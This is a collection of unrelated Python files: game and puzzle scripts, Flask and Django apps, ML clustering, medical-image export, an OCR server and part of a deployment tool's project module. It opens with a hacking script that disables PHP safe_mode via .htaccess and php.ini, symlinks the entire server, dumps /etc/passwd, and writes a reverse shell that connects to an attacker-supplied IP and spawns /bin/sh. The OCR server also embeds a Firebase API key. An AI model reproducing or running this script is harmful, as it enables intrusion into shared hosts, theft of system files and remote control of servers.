htacess.write(inputx)
phpini = open ('php.ini', 'w')
input2 = ('safe_mode = off disabled_functions = none')
phpini.write(input2)
os.system(SysCls)
os.system(cd)
os.system(symlink)
os.system(passwd)
os.system(pwd)
def BackConnect():
back = open ('back.py' , 'w')
inback = '''ip = sys.argv[1] \n port2 = int(sys.argv[2]) \nsocket.setdefaulttimeout(60) \ndef outside(): \ntry: \nsok = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \nsok.connect((ip,port2)) \nsok.send('roote.dz@gmail.com@gmail.com \nmidset007.net \n') \nos.dup2(sok.fileno(),0) \nos.dup2(sok.fileno(),1) \nos.dup2(sok.fileno(),2) \nos.dup2(sok.fileno(),3) \nshell = subprocess.call(["/bin/sh","-i"]) \nexcept socket.timeout: \nprint ("[!] Connection timed out") \nexcept socket.error: \nprint ("[!] Error while connecting") \noutside() '''
back.write(inback)
os.system('chmod 755 back.py')
print('''
Welcome to my script :) :)
please choose one of these options :
0 - quit program
1- BackConnect (create a back connect file)
2- create Symlink to whole server
3- create Symlink to a file
PS : * if you used choices 2 or 3 we will bypass safe_mode in server
* a passwd.txt file will created cointain /etc/passwd file
* you will find files in "sym"
if you are using this Script from the web, you can BackConnect by typing
python SymConnect.py [ip] [port]
example: python SymConnect 192.168.0.0 77
''')
ann = raw_input("Mid-Set >>> ")
all = 0
if ann == '1' :
BackConnect()
ip = input ('enter you ip address')
port = input ('enter the port to listennning')
os.system('python back.py %s %s') % (ip, port)
print('# Connecting...')
elif ann == '2':
sym()
print('the server symlink created successfully in 1.txt ')
print('--------------------------------------------------')
elif ann == '3':
directory = input ('Enter the file you would create symlink for>>>')
print('~~~~~~~~~~~~~~~~')
where = input ('select a name for the file containt your dirocroty sym >>> ')
os.system('ln -s %s %s') % (where, directory )
print('your symlin in %s ') % (where)
os.system(pwd)
sym()
else:
print('Does not support this system, Only Linux :D')
|
import pandas as pd
i = 0
df = pd.read_excel("Puzzel 2.xlsx")
# Clean Up
df["Policy"] = df["Policy"].str.strip()
df["Password"] = df["Password"].str.strip()
# Convert columns from Object to String
df['Policy'] = df['Policy'].convert_dtypes()
df['Password'] = df['Password'].convert_dtypes()
# Getting Columns with required info to check passwords
df["Letter"] = [x.strip()[-1] for x in df['Policy']]
df["LowerLimit"] = [x.split("-", -1)[0] for x in df['Policy']]
df["UpperLimit"] = [x.split("-", -1)[1].split(" ", -1)[0] for x in df['Policy']]
df["Letter"] = df["Letter"].convert_dtypes()
df["LowerLimit"] = df["LowerLimit"].astype('int')
df["UpperLimit"] = df["UpperLimit"].astype('int')
# Loop through elements and check every row
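# A row counts as valid only when exactly one of the two 1-based positions holds the policy letter (both or neither fails).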
count = 0
for i in range(0, 1000):
L = df["Letter"].iloc[i]
S = df["LowerLimit"].iloc[i]
SP = df["UpperLimit"].iloc[i]
P = df["Password"].iloc[i]
if P[S-1] == L and P[SP-1] == L:
pass
elif P[S-1] != L and P[SP-1] != L:
pass
else:
count += 1
print(count)
|
from flask import Flask, request, jsonify, make_response, abort
from PIL import Image
import PIL
from flask_cors import CORS, cross_origin
from io import BytesIO
import base64
import pretrained_example
app = Flask(__name__)
cors = CORS(app)
app.config['CORS_HEADERS'] = 'Content-Type'
@app.after_request
def after_request(response):
header = response.headers
header['Access-Control-Allow-Origin'] = '*'
return response
def pil2datauri(data):
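    # NOTE: generate_random_image is not defined in this file; it is assumed to be provided by the imported pretrained_example module.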
img = generate_random_image(data)
data = BytesIO()
img.save(data, "JPEG")
data64 = base64.b64encode(data.getvalue())
return u'data:img/jpeg;base64,'+data64.decode('utf-8')
@app.route('/gen', methods=['OPTIONS', 'POST'])
def create_task():
if request.method == "OPTIONS":
return _build_cors_prelight_response()
elif request.method == "POST":
if not request.json:
abort(400)
data = request.json
g = pil2datauri(data)
return g, 201
else:
abort(400)
def _build_cors_prelight_response():
response = make_response()
response.headers.add("Access-Control-Allow-Origin", "*")
response.headers.add('Access-Control-Allow-Headers', "*")
response.headers.add('Access-Control-Allow-Methods', "*")
return response
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=False)
|
# Generated by Django 2.2 on 2019-04-12 15:35
from django.db import migrations, models
import django.db.models.deletion
import yohbiteapp.models
class Migration(migrations.Migration):
dependencies = [
('yohbiteapp', '0008_driver_location'),
]
operations = [
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='District',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.CharField(max_length=100)),
('description', models.TextField(default='No Description')),
('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='yohbiteapp.Country')),
],
),
migrations.CreateModel(
name='Local',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('local', models.CharField(max_length=100)),
('description', models.TextField(default='No Description')),
('state', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='yohbiteapp.District')),
],
),
migrations.CreateModel(
name='LocalType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('local', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='MealType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('local', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
],
),
migrations.AlterField(
model_name='meal',
name='image',
field=models.ImageField(upload_to=yohbiteapp.models.meals_upload_path),
),
migrations.AlterField(
model_name='restaurant',
name='logo',
field=models.ImageField(upload_to=yohbiteapp.models.restuarant_upload_path),
),
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField(blank=True, null=True)),
('local', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='yohbiteapp.Local')),
('localType', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='yohbiteapp.LocalType')),
],
),
]
|
from sklearn.cluster import KMeans
from sklearn import manifold
import matplotlib.pyplot as plt
import numpy as np
from sentence_transformers import SentenceTransformer
model = SentenceTransformer('paraphrase-TinyBERT-L6-v2')
n_clusters = 20
# Read file and make embedding
f = open('../final.txt', 'r')
words = []
while True:
line = f.readline()
if not line:
break
words.append(line[:-1]) # remove the last '\n'
embs = model.encode(words) # embeddings
words = np.array(words)
embs = np.array(embs)
# Clustering
kmeans = KMeans(n_clusters=n_clusters, random_state=0).fit(embs) # clustering
labels = kmeans.labels_
# Write file
for i in range(n_clusters):
pos = np.where(labels==i)
w = words[pos[0]]
f_name = 'out_%s.txt' % i
f_out = open(f_name, 'w')
for j in w:
f_out.write(j+'\n')
f_out.close()
f.close()
# Visualization
tsne = manifold.TSNE(n_components=2, init='pca', random_state=0).fit_transform(embs)
figure, axesSubplot = plt.subplots()
axesSubplot.scatter(tsne[:, 0], tsne[:, 1], c=labels)
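# Note: the scatter is only drawn in memory here; call plt.show() or figure.savefig(...) to actually view or save the t-SNE plot.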
|
import SimpleITK as sitk
def printst(step,flow_field_x1, ed_source, flow_field_x2, es_source):
# pt = source[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/source' + str(step) + '.nii')
# pt = img_ed[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/ed' + str(step) + '.nii')
#
# pt = img_es[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/es' + str(step) + '.nii')
# pt = img_pre[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/esaft' + str(step) + '.nii')
#
# pt = img_mid[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/esmid' + str(step) + '.nii')
#
# pt = img_aft[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/espre' + str(step) + '.nii')
# mm = labeled[0, 1, :, :, :] * 1 + labeled[0, 2, :, :, :] * 2 + labeled[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = labeled[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/labeled' + str(step) + '.nii')
#
# mm = labeles[0, 1, :, :, :] * 1 + labeles[0, 2, :, :, :] * 2 + labeles[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = labeles[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.00, 1.00, 1.00))
# sitk.WriteImage(out, './state/labeles' + str(step) + '.nii')
# pt = warped_ed[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/es-ed' + str(step) + '.nii')
pt = ed_source[0, 0, :, :, :].data.cpu().numpy()
# pt = np.transpose(pt, (2, 1, 0))
out = sitk.GetImageFromArray(pt)
out.SetSpacing((1.00, 1.00, 1.00))
sitk.WriteImage(out, './state/ed-source' + str(step) + '.nii')
pt = es_source[0, 0, :, :, :].data.cpu().numpy()
# pt = np.transpose(pt, (2, 1, 0))
out = sitk.GetImageFromArray(pt)
out.SetSpacing((1.00, 1.00, 1.00))
sitk.WriteImage(out, './state/es-source' + str(step) + '.nii')
# pt = step1_flow[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-es-pre' + str(step) + '.nii')
#
# pt = step2_flow[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-es-mid' + str(step) + '.nii')
#
# pt = step3_flow[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-es-aft' + str(step) + '.nii')
#
# pt = step4_flow[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-es-ed' + str(step) + '.nii')
pt = flow_field_x1[0, :, :, :, :].data.cpu().numpy()
# pt = np.transpose(pt, (2, 1, 0))
out = sitk.GetImageFromArray(pt)
out.SetSpacing((1.00, 1.00, 1.00))
sitk.WriteImage(out, './state/ed_source_flow' + str(step) + '.nii')
pt = flow_field_x2[0, :, :, :, :].data.cpu().numpy()
# pt = np.transpose(pt, (2, 1, 0))
out = sitk.GetImageFromArray(pt)
out.SetSpacing((1.00, 1.00, 1.00))
sitk.WriteImage(out, './state/es_source_flow' + str(step) + '.nii')
# pt = flow_field[0, :, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/wholeflow' + str(step) + '.nii')
#
# pt = speed_combin[0, :, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/speed-wholeflow' + str(step) + '.nii')
#
# mm = fuse_es_seg[0, 1, :, :, :] * 1 + fuse_es_seg[0, 2, :, :, :] * 2 + fuse_es_seg[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# # pt = start_seg[0, 0, :, :, :].data.cpu().numpy()
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/fuse-seg-es' + str(step) + '.nii')
#
# mm = fuse_ed_seg[0, 1, :, :, :] * 1 + fuse_ed_seg[0, 2, :, :, :] * 2 + fuse_ed_seg[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = final_seg[0, 0, :, :, :].data.cpu().numpy()
#
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/fuse-seg-ed' + str(step) + '.nii')
#
# mm = es_seg[0, 1, :, :, :] * 1 + es_seg[0, 2, :, :, :] * 2 + es_seg[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# # pt = start_seg[0, 0, :, :, :].data.cpu().numpy()
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/seg-es' + str(step) + '.nii')
#
# mm = ed_seg[0, 1, :, :, :] * 1 + ed_seg[0, 2, :, :, :] * 2 + ed_seg[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = final_seg[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/seg-ed' + str(step) + '.nii')
#
# mm = es_seg_flow[0, 1, :, :, :] * 1 + es_seg_flow[0, 2, :, :, :] * 2 + es_seg_flow[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = flfinseg[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/reg-seg-es' + str(step) + '.nii')
#
# mm = ed_seg_flow[0, 1, :, :, :] * 1 + ed_seg_flow[0, 2, :, :, :] * 2 + ed_seg_flow[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = flstaseg[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/reg-seg-ed' + str(step) + '.nii')
#
# mm = seg_es[0, 1, :, :, :] * 1 + seg_es[0, 2, :, :, :] * 2 + seg_es[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# # pt = start_seg[0, 0, :, :, :].data.cpu().numpy()
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/seg-es' + str(step) + '.nii')
#
# mm = seg_ed[0, 1, :, :, :] * 1 + seg_ed[0, 2, :, :, :] * 2 + seg_ed[0, 3, :, :, :] * 3
# pt = mm.data.cpu().numpy()
# # pt = final_seg[0, 0, :, :, :].data.cpu().numpy()
# # pt = np.transpose(pt, (2, 1, 0))
# out = sitk.GetImageFromArray(pt)
# out.SetSpacing((1.25, 1.25, 16))
# sitk.WriteImage(out, './state/seg-ed' + str(step) + '.nii')
|
# a=['banana','apple','microsoft']
# for i in a:
# print(i)
# b=[20,10,5]
# for j in b:
# print(j)
# s=0
# for i in b:
# s+=i
# print(s)
# c=list(range(1,5))
# print(c)
s=0
for i in range(1,5):
s+=i
print(s)
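# range(1, 5) covers 1..4, so this prints 10.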
s1=0
for i in range(1,8):
if i%3==0:
s1+=i
print(s1)
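# The multiples of 3 in 1..7 are 3 and 6, so this prints 9.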
|
for total_budget in range(1, 11):
fileresult = [[], [], []]
for setting in range(2, 3):
if setting == 1:
data_name = "email"
product_name = "prod_r1p3n1"
num_ratio, num_price = 1, 3
elif setting == 2:
data_name = "email"
product_name = "prod_r1p3n2"
num_ratio, num_price = 1, 3
elif setting == 3:
data_name = "email"
product_name = "prod_r1p4n1"
num_ratio, num_price = 1, 4
elif setting == 4:
data_name = "email"
product_name = "prod_r1p4n2"
num_ratio, num_price = 1, 4
elif setting == 5:
data_name = "email"
product_name = "prod_r1p5n1"
num_ratio, num_price = 1, 5
elif setting == 6:
data_name = "email"
product_name = "prod_r1p5n2"
num_ratio, num_price = 1, 5
elif setting == 7:
data_name = "email"
product_name = "prod_r2p2n1"
num_ratio, num_price = 2, 2
elif setting == 8:
data_name = "email"
product_name = "prod_r2p2n2"
num_ratio, num_price = 2, 2
for times in range(9, 109, 10):
result_name = "result/" + data_name + "_" + product_name + "_sn/" + data_name + "_" + product_name + "_b" + str(total_budget) + "_i" + str(times+1) + ".txt"
lnum = 0
with open(result_name) as f:
for line in f:
lnum += 1
if lnum == 1 or lnum == 3:
continue
elif lnum == 2:
(l) = line.split()
avg_pro = float(l[2])
fileresult[0].append(avg_pro)
elif lnum == 4:
atime, ttime = "", ""
(l) = line.split()
avg_time = list(l[5])
total_time = list(l[2])
for at in avg_time[0: len(avg_time) - 3]:
atime = atime + at
for tt in total_time[0: len(total_time) - 4]:
ttime = ttime + tt
fileresult[1].append(float(atime))
fileresult[2].append(float(ttime))
else:
break
fw = open("result/avg_pro_b" + str(total_budget) + ".txt", 'w')
for num in fileresult[0]:
fw.write(str(num) + "\n")
fw.close()
fw = open("result/avg_time_b" + str(total_budget) + ".txt", 'w')
for num in fileresult[1]:
fw.write(str(num) + "\n")
fw.close()
fw = open("result/total_time_b" + str(total_budget) + ".txt", 'w')
for num in fileresult[2]:
fw.write(str(num) + "\n")
fw.close()
|
# This is a challenge:
# define a function that takes any number of lists of numbers
l1,l2,l3=[1,2,3], [4,5,6],[7,8,9]
# and returns the element-wise averages:
# (1+4+7)/3, (2+5+8)/3, (3+6+9)/3
# Try to write this as an anonymous one-line function using lambda.
#def func(*args):
# promedios=tuple(map(lambda x: sum(x)/len(x),args))
# return promedios
#print(func(l1,l2,l3))
#other method
def average_finder(*args):
average=[]
for pair in zip(*args):
average.append(sum(pair)/len(pair))
return average
print(average_finder(l1,l2,l3))
promedios= lambda *args:[sum(pair)/len(pair) for pair in zip(*args)]
print(promedios(l1,l2,l3))
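# Both versions print [4.0, 5.0, 6.0] for the example lists above.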
|
def conjugate(verb, pronoun, tense):
verbs = ["ayudar", "bailar", "buscar", "comprar", "dibujar", "escuchar", "estar",
|
from django.conf.urls.defaults import *
urlpatterns = patterns('devices.views',
(r'^$', 'index'),
(r'^(?P<device_id>\d+)/wipe/$', 'wipe'),
(r'^(?P<device_id>\d+)/trackfrequency', 'update_track_frequency'),
(r'^(?P<device_id>\d+)/send/$', 'send_c2dm'),
)
|
import os, sys, time, copy, datetime
from flask import Flask, render_template, request, jsonify, current_app
import argparse
import subprocess
import pytesseract
import json
import wget
import time
from detect_rectangle import detect_rect
from barcode import readBar
from detect_region import detect_region
from detect_line import boxes_pipeline
from PIL import Image, ImageDraw
import crnn_ocr
from ctpn.get_boxes import LineDetector
from firebase import Firebase
import urllib.request
firebaseConfig = {
"apiKey": "AIzaSyAOew38a3cmVkrClA3TfIeJwgP-xEBIhdE",
"authDomain": "vnpost-6d57e.firebaseapp.com",
"databaseURL": "https://vnpost-6d57e.firebaseio.com",
"projectId": "vnpost-6d57e",
"storageBucket": "vnpost-6d57e.appspot.com",
"messagingSenderId": "419665295516",
"appId": "1:419665295516:web:7e3ec35c1c4e7514"
}
firebase = Firebase(firebaseConfig)
line_detector = LineDetector("ctpn/network/ctpn.pb")
app = Flask(__name__)
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
DPI = 300
ALL_LINE_SIZE = (1000, 64)
all_ocrer = crnn_ocr.CRNNOCR(model_path="../duc/vnpost_ocr/ocr.model", normalize_size=ALL_LINE_SIZE,
alphabet_path="../duc/vnpost_ocr/char")
root_dir = os.getcwd()
def process_region(path):
list_lines = boxes_pipeline(path, line_detector)
print (list_lines)
list_text = []
org_img = Image.open(path).convert("RGB")
for line in list_lines:
# crop
cropped = org_img.crop(line)
# detect
line_content, sent_prob = all_ocrer.run_image(cropped)
print ("content:", line_content, sent_prob )
list_text.append(line_content)
name = list_text[0]
phone = list_text[-1]
address = " ".join(list_text[1:-1])
return {"name":name, "address":address, "phone":phone}
app.config['JSON_AS_ASCII'] = False
@app.route("/upload", methods=['POST'])
def upload():
# upload a file: curl -F "file=@/data/workspace/evnml/data/pdf/14178.PDF" localhost:2019/upload
data_path = os.path.join(root_dir, "../data")
os.makedirs(name=data_path, exist_ok=True)
try:
if request.method == 'POST':
_data = request.data.decode()
if (len(_data)):
                url = json.loads(_data)["url"]  # parse the JSON body instead of eval-ing untrusted request data
else:
url = request.form.get('url')
tmp_name = "../data/{}.jpg".format(int(time.time()*1000))
print ("[INFO] Save",url," to ", tmp_name)
# wget.download(url, tmp_name, bar=None)
urllib.request.urlretrieve(url, tmp_name)
detect_rect.run(tmp_name)
detect_region.run("crop.png")
bar_string = readBar.run("bar.png")
#
result_metadata = {}
result_metadata["from"] = process_region("region_from.png")
result_metadata["to"] = process_region("region_to.png")
result_metadata["barcode"] = bar_string
result_metadata["status"] = True
return jsonify(result_metadata)
except Exception as e:
print (e)
        return jsonify({"status": False, "error": str(e)})
if __name__ == "__main__":
parser = argparse.ArgumentParser()
app.run(host="0.0.0.0", port=30033, debug=False)
|
class VolSmileData:
def __init__(self, pillar_date, rd, rf, vols):
self.pillar_date = pillar_date
self.rd = rd
self.rf = rf
self.vols = vols
# Sticky Strike
class VolSurfaceData:
def __init__(self, underlying_name, market_date, spot_date, spot, strikes, smiles):
self.underlying_name = underlying_name
self.market_date = market_date
self.spot_date = spot_date
self.spot = spot
self.strikes = strikes
self.smiles = smiles
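# Illustrative usage sketch only: the values below are hypothetical, and since the
# classes impose no types, the dates could equally be datetime.date objects.
example_smile = VolSmileData(pillar_date="2021-06-30", rd=0.01, rf=0.005, vols=[0.12, 0.10, 0.11])
example_surface = VolSurfaceData(
    underlying_name="EURUSD",
    market_date="2021-03-31",
    spot_date="2021-04-02",
    spot=1.17,
    strikes=[1.10, 1.17, 1.25],
    smiles=[example_smile],
)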
|
#set of character actions for game play
import random
import char_actions  # assumed: module providing the character class used below
def say(noun):
return 'You said "{}"'.format(noun)
def attacknow(noun):
ca=char_actions.character("Pauly","Elf")
return ca.attack("Elf")
|
# Copyright (c) 2020 Adam Souzis
# SPDX-License-Identifier: MIT
"""
Classes for managing the local environment.
Repositories can optionally be organized into projects that have a local configuration.
By convention, the "home" project defines a localhost instance and adds it to its context.
"""
import os
import os.path
import datetime
import six
from .repo import Repo, normalizeGitUrl, splitGitUrl, RepoView
from .util import UnfurlError
from .merge import mergeDicts
from .yamlloader import YamlConfig, makeVaultLib
from . import DefaultNames, getHomeConfigPath
from six.moves.urllib.parse import urlparse
_basepath = os.path.abspath(os.path.dirname(__file__))
class Project(object):
"""
    An Unfurl project is a folder that contains at least a local configuration file (unfurl.yaml)
    and one or more ensemble.yaml files, which may optionally be organized into one or more git repositories.
"""
def __init__(self, path, homeProject=None):
assert isinstance(path, six.string_types), path
parentConfig = homeProject and homeProject.localConfig or None
self.projectRoot = os.path.abspath(os.path.dirname(path))
if os.path.exists(path):
self.localConfig = LocalConfig(path, parentConfig)
else:
self.localConfig = LocalConfig(parentConfig=parentConfig)
self._setRepos()
if self.projectRepo and homeProject:
homeProject.localConfig.registerProject(self)
def _setRepos(self):
# abspath => RepoView:
self.workingDirs = Repo.findGitWorkingDirs(self.projectRoot)
# the project repo if it exists manages the project config (unfurl.yaml)
projectRoot = self.projectRoot
if projectRoot in self.workingDirs:
self.projectRepo = self.workingDirs[projectRoot].repo
else:
            # the project may be part of a containing repo (if created with the --existing option)
repo = Repo.findContainingRepo(self.projectRoot)
# make sure projectroot isn't excluded from the containing repo
if repo and not repo.isPathExcluded(self.projectRoot):
self.projectRepo = repo
self.workingDirs[repo.workingDir] = repo.asRepoView()
else:
self.projectRepo = None
if self.projectRepo:
# Repo.findGitWorkingDirs() doesn't look inside git working dirs
# so look for repos in dirs that might be excluded from git
for dir in self.projectRepo.findExcludedDirs(self.projectRoot):
if projectRoot in dir and os.path.isdir(dir):
Repo.updateGitWorkingDirs(self.workingDirs, dir, os.listdir(dir))
# add referenced local repositories outside of the project
for path in self.localConfig.localRepositories:
if os.path.isdir(path):
# XXX assumes its a git repo, should compare and validate lock metadata
Repo.updateGitWorkingDirs(self.workingDirs, path, os.listdir(path))
@staticmethod
def normalizePath(path):
path = os.path.abspath(path)
if not os.path.exists(path):
isdir = not path.endswith(".yml") and not path.endswith(".yaml")
else:
isdir = os.path.isdir(path)
if isdir:
return os.path.join(path, DefaultNames.LocalConfig)
else:
return path
@staticmethod
def findPath(testPath):
"""
Walk parents looking for unfurl.yaml
"""
current = os.path.abspath(testPath)
while current and current != os.sep:
test = os.path.join(current, DefaultNames.LocalConfig)
if os.path.exists(test):
return test
test = os.path.join(
current, DefaultNames.ProjectDirectory, DefaultNames.LocalConfig
)
if os.path.exists(test):
return test
current = os.path.dirname(current)
return None
@property
def venv(self):
venv = os.path.join(self.projectRoot, ".venv")
if os.path.isdir(venv):
return venv
return None
def getAsdfPaths(self, asdfDataDir, toolVersions={}):
paths = []
toolVersionsFilename = (
os.getenv("ASDF_DEFAULT_TOOL_VERSIONS_FILENAME") or ".tool-versions"
)
versionConf = os.path.join(self.projectRoot, toolVersionsFilename)
if os.path.exists(versionConf):
with open(versionConf) as conf:
for line in conf.readlines():
line = line.strip()
if line and line[0] != "#":
tokens = line.split()
plugin = tokens.pop(0)
versions = toolVersions.setdefault(plugin, set())
for version in tokens:
if version != "system":
path = os.path.join(
asdfDataDir, "installs", plugin, version, "bin"
)
versions.add(version)
if os.path.isdir(path):
paths.append(path)
return paths
def getRepos(self):
repos = [r.repo for r in self.workingDirs.values()]
if self.projectRepo and self.projectRepo not in repos:
repos.append(self.projectRepo)
return repos
def getDefaultEnsemblePath(self):
fullPath = self.localConfig.getDefaultManifestPath()
if fullPath:
return fullPath
return os.path.join(
self.projectRoot, DefaultNames.EnsembleDirectory, DefaultNames.Ensemble
)
def findDefaultInstanceManifest(self):
fullPath = self.localConfig.getDefaultManifestPath()
if fullPath:
if not os.path.exists(fullPath):
raise UnfurlError(
"The default ensemble found in %s does not exist: %s"
% (self.localConfig.config.path, os.path.abspath(fullPath))
)
return fullPath
else:
# no manifest specified in the project config so check the default locations
fullPath = os.path.join(
self.projectRoot, DefaultNames.EnsembleDirectory, DefaultNames.Ensemble
)
if os.path.exists(fullPath):
return fullPath
fullPath2 = os.path.join(self.projectRoot, DefaultNames.Ensemble)
if os.path.exists(fullPath2):
return fullPath2
raise UnfurlError(
                'Can not find an ensemble in a default location: "%s" or "%s"'
% (fullPath, fullPath2)
)
def getRelativePath(self, path):
return os.path.relpath(os.path.abspath(path), self.projectRoot)
def isPathInProject(self, path):
return not self.getRelativePath(path).startswith("..")
def _createPathForGitRepo(self, gitUrl):
name = Repo.getPathForGitRepo(gitUrl)
return self.getUniquePath(name)
def getUniquePath(self, name):
basename = name
counter = 1
while os.path.exists(os.path.join(self.projectRoot, name)):
name = basename + str(counter)
counter += 1
return os.path.join(self.projectRoot, name)
def findGitRepo(self, repoURL, revision=None):
candidate = None
for dir, repository in self.workingDirs.items():
repo = repository.repo
if repoURL.startswith("git-local://"):
initialCommit = urlparse(repoURL).netloc.partition(":")[0]
match = initialCommit == repo.getInitialRevision()
else:
match = normalizeGitUrl(repoURL) == normalizeGitUrl(repo.url)
if match:
if revision:
if repo.revision == repo.resolveRevSpec(revision):
return repo
candidate = repo
else:
return repo
return candidate
def findPathInRepos(self, path, importLoader=None):
"""If the given path is part of the working directory of a git repository
return that repository and a path relative to it"""
# importloader is unused until pinned revisions are supported
candidate = None
for dir in sorted(self.workingDirs.keys()):
repo = self.workingDirs[dir].repo
filePath = repo.findRepoPath(path)
if filePath is not None:
return repo, filePath, repo.revision, False
# XXX support bare repo and particular revisions
# need to make sure path isn't ignored in repo or compare candidates
# filePath, revision, bare = repo.findPath(path, importLoader)
# if filePath is not None:
# if not bare:
# return repo, filePath, revision, bare
# else: # if it's bare see if we can find a better candidate
# candidate = (repo, filePath, revision, bare)
return candidate or None, None, None, None
def createWorkingDir(self, gitUrl, ref=None):
localRepoPath = self._createPathForGitRepo(gitUrl)
repo = Repo.createWorkingDir(gitUrl, localRepoPath, ref)
# add to workingDirs
self.workingDirs[os.path.abspath(localRepoPath)] = repo.asRepoView()
return repo
def findGitRepoFromRepository(self, repoSpec):
repoUrl = repoSpec.url
return self.findGitRepo(splitGitUrl(repoUrl)[0])
def findOrClone(self, repo):
gitUrl = repo.url
existingRepo = self.findGitRepo(gitUrl)
if existingRepo:
return existingRepo
# if not found:
localRepoPath = os.path.abspath(
self._createPathForGitRepo(repo.workingDir or gitUrl)
)
newRepo = repo.clone(localRepoPath)
# use gitUrl to preserve original origin
